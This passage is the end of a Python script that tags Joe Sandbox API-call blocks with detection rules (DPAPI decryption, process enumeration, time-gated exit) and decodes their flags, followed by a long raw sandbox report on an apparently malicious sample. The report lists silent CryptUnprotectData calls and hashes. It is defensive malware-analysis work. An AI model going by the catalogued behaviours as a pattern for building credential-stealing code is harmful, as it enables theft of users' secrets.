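# A block earns a tag when it calls every API in the set (tags are ours).
RULES = {
    "dpapi_decrypt": {"CryptUnprotectData"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "base64_encode": {"CryptBinaryToStringA"},
    "base64_decode": {"CryptStringToBinaryA"},
    "timezone_fingerprint": {"GetTimeZoneInformation"},
    "time_gated_exit": {"SystemTimeToFileTime", "ExitProcess"},
}

# (api, 0-based argument index) -> documented flag bits of that parameter.
FLAG_DECODERS = {
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS"},
    ("CryptBinaryToStringA", 2): {0x1: "CRYPT_STRING_BASE64", 0x40000000: "CRYPT_STRING_NOCRLF"},
    ("CryptStringToBinaryA", 2): {0x1: "CRYPT_STRING_BASE64"},
    ("CryptUnprotectData", 5): {0x1: "CRYPTPROTECT_UI_FORBIDDEN"},
}

def decode_flags(api, pos, value):
    """Name the known bits of a flag argument; leftover bits stay as hex."""
    names, covered = [], 0
    for bit, name in FLAG_DECODERS[(api, pos)].items():
        if value & bit == bit:
            names.append(name)
            covered |= bit
    if value & ~covered:
        names.append(f"0x{value & ~covered:X}")
    return names

def parse_args(text):
    """'?,00000000' -> [None, 0]; '?' is a value the sandbox could not resolve."""
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")] if text else []

@dataclass
class Block:
    calls: list = field(default_factory=list)  # (api, module, args, ref)

    def tags(self):
        apis = {api for api, _, _, _ in self.calls}
        return sorted(t for t, need in RULES.items() if need <= apis)

    def decoded_flags(self):
        return [(api, ref, decode_flags(api, pos, value))
                for api, _, args, ref in self.calls
                for pos, value in enumerate(args)
                if value is not None and (api, pos) in FLAG_DECODERS]

def parse_report(text):
    """'APIs' opens a block, 'Memory Dump Source' closes it; other lines are ignored."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = Block()
        elif stripped == "Memory Dump Source":
            if current is not None and current.calls:
                blocks.append(current)
            current = None
        elif current is not None and (m := API_LINE.match(stripped)):
            current.calls.append((m["name"], m["module"], parse_args(m["args"]), m["ref"]))
    return blocks

if __name__ == "__main__":
    for block in parse_report(SAMPLE):
        print(f"function near {block.calls[0][3]}: {', '.join(block.tags()) or 'untagged'}")
        for api, ref, names in block.decoded_flags():
            print(f"    {api} @ {ref}: {' | '.join(names)}")
```

On the embedded sample the four blocks come out as time_gated_exit, dpapi_decrypt, process_enumeration and base64_encode, and the flag decoder resolves the 40000001 passed to CryptBinaryToStringA to CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF (base64 without line breaks) and the 1 passed to CryptUnprotectData to CRYPTPROTECT_UI_FORBIDDEN (no DPAPI prompt). Arguments the sandbox prints as ? are skipped rather than guessed. Extending RULES and FLAG_DECODERS is the point of the script; the report's own API ID strings (e.g. Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide) carry the same API names in fragment form and could be matched instead of the bullet lines.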
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [J[w$o#.$}
                          • API String ID: 0-2732673298
                          • Opcode ID: 2adce1a88e54d793f6cd1c324935ee82c461fbc6fc3b60fe00478ad6bb5e68d1
                          • Instruction ID: 0159a9dbfe687bd634776e6dc96b5368855ee8353b8be4565497c65e2c708400
                          • Opcode Fuzzy Hash: 2adce1a88e54d793f6cd1c324935ee82c461fbc6fc3b60fe00478ad6bb5e68d1
                          • Instruction Fuzzy Hash: 58B218F3A0C6049FE304AE2DEC8566BBBE9EF94720F16493DE6C5C7744E63598018693
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: yW$!)N~$eLM
                          • API String ID: 0-2963522718
                          • Opcode ID: 8b625bfd389406f9e14cc9eba3ee55907192dbb2f119774d875c5f817b1b2b85
                          • Instruction ID: b748d92cdf605952692450c9f57414b44107944fb5f2a38ddc2677352a989edf
                          • Opcode Fuzzy Hash: 8b625bfd389406f9e14cc9eba3ee55907192dbb2f119774d875c5f817b1b2b85
                          • Instruction Fuzzy Hash: 03B216F3A0C2009FE304AE2DEC8567ABBE5EF94720F16853DEAC5C3744E63598158697
                          APIs
                          • CoCreateInstance.COMBASE(0013E118,00000000,00000001,0013E108,00000000), ref: 00133758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001337B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                          • Instruction ID: e1f689fa069158809c4d53d1e8600c956cc7fc5397f1e1b0ea5e8f3b9c9138ab
                          • Opcode Fuzzy Hash: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                          • Instruction Fuzzy Hash: F741C970A40A189FDB24DB58CC95F9BB7B5BB48702F4082D8E619A72D0D7B16E85CF50
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                          • LocalFree.KERNEL32(?), ref: 00129BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 25ad503e6a1a8ee0817907f34357c95babcbb2fa3614b5ed0024321d417cd486
                          • Instruction ID: 2d2ddcda7b4c00bb6698b69bc7b3a1290b39537db8046fa7f33b127665cc4f95
                          • Opcode Fuzzy Hash: 25ad503e6a1a8ee0817907f34357c95babcbb2fa3614b5ed0024321d417cd486
                          • Instruction Fuzzy Hash: FE11BAB8A00209DFDB05DF98D989EAE77B9FF88300F104558E915A7350D770AE10CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ^l['$zk~
                          • API String ID: 0-1084074335
                          • Opcode ID: e7f4d5bb33f76835412a9e5ceb51df93b2205497dbf078d514b6520261b1925c
                          • Instruction ID: 9b18fe980c05d5a93b399560b8e1ac7c3cff6d8cd58712a31a6780039d1bf386
                          • Opcode Fuzzy Hash: e7f4d5bb33f76835412a9e5ceb51df93b2205497dbf078d514b6520261b1925c
                          • Instruction Fuzzy Hash: F7B219F360C2009FE308AE2DEC8567AB7E9EF94720F1A453DE6C4C7744EA7558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Di$FGl
                          • API String ID: 0-934752213
                          • Opcode ID: 6e8e10db5283d05b4421876d410ffb19fa8baa7dd5cc4af2a64bca311a9e934b
                          • Instruction ID: 24596a2fa3c44dab1fcdb0bd69096ba868cfb88810555d08edc93573e8a49bab
                          • Opcode Fuzzy Hash: 6e8e10db5283d05b4421876d410ffb19fa8baa7dd5cc4af2a64bca311a9e934b
                          • Instruction Fuzzy Hash: C2B2F7F390C2049FE3046E29EC8567AFBE9EF94720F1A893DEAC583744E63558058797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: LAC@$P~
                          • API String ID: 0-2286227996
                          • Opcode ID: 2e5278e22b2276a944afb2e5a155b515c9d6458e06c9b5c0c8d92d8fa461ed75
                          • Instruction ID: d09248d9580e5736e4ab0b19f11a37c6032252c14e16e9975d8df1cc19c917fc
                          • Opcode Fuzzy Hash: 2e5278e22b2276a944afb2e5a155b515c9d6458e06c9b5c0c8d92d8fa461ed75
                          • Instruction Fuzzy Hash: 912217F360C3149FD304AE6DEC8576ABBE9EF98320F16493DEAC4C3744EA7558048696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #do
                          • API String ID: 0-3463800784
                          • Opcode ID: f2da50473eaf3d93b251330c512c3b584a1746b2b5a2c3e17b4d6afd8648f4ac
                          • Instruction ID: d0a910e41894d209021896fa16bf824ac32bb90a8a4e228feedf2dafeaa03107
                          • Opcode Fuzzy Hash: f2da50473eaf3d93b251330c512c3b584a1746b2b5a2c3e17b4d6afd8648f4ac
                          • Instruction Fuzzy Hash: FC82F5F360C204AFE304AE69EC8577AB7E5EFD4720F1A893DE6C4C3744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Jc=
                          • API String ID: 0-2291069331
                          • Opcode ID: 8773f003bfbbcb366be4da973bf9fe58c66699673d85c1ab2e06a0521c1e7d04
                          • Instruction ID: 3c9caacb1b077c6f70588b3e021aa8a473bbda93f4e5fd75be0625550ada78cc
                          • Opcode Fuzzy Hash: 8773f003bfbbcb366be4da973bf9fe58c66699673d85c1ab2e06a0521c1e7d04
                          • Instruction Fuzzy Hash: 7FB1BAF3A082149FE7109E2CEC847ABB7D6EF94710F2A4A3DEAC5C3744E5359D058686
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;jn
                          • API String ID: 0-3078770120
                          • Opcode ID: 44edd84c0ce58a3379cb4ef9346bf4b4bbeca8b6471efdd88f74c452730757e6
                          • Instruction ID: ba99744c347ec9d5a68e40b7c8bb74aa29a0ebae3499756dc53c483cbcda79a9
                          • Opcode Fuzzy Hash: 44edd84c0ce58a3379cb4ef9346bf4b4bbeca8b6471efdd88f74c452730757e6
                          • Instruction Fuzzy Hash: 0241C6F3A1C1009BD318BE2DDC81B6ABBE5EB58310F16493DEAC4C7754EA3594108B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: pJ=v
                          • API String ID: 0-3841518369
                          • Opcode ID: bb3430de9b5191fbb2dd27c397ce017c7d604250cbf869dfe5dc820cee31221a
                          • Instruction ID: ee450f0fa5cf6673f43680f436b744aa3b7ffab47905de309989bf415e9ec196
                          • Opcode Fuzzy Hash: bb3430de9b5191fbb2dd27c397ce017c7d604250cbf869dfe5dc820cee31221a
                          • Instruction Fuzzy Hash: 373116B76086049FE304AE2BED4463BF7E6EFD4B20F15C52DE6C4C7608DA3488068696
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31fa23243c9a9884c97354c9ccc1bbe0410829e8ddecbae672c928c4206f0ee0
                          • Instruction ID: f0d01a09a973d52c88da1deee2bb786cac33c1f971669bd244bf81b5d6c409c4
                          • Opcode Fuzzy Hash: 31fa23243c9a9884c97354c9ccc1bbe0410829e8ddecbae672c928c4206f0ee0
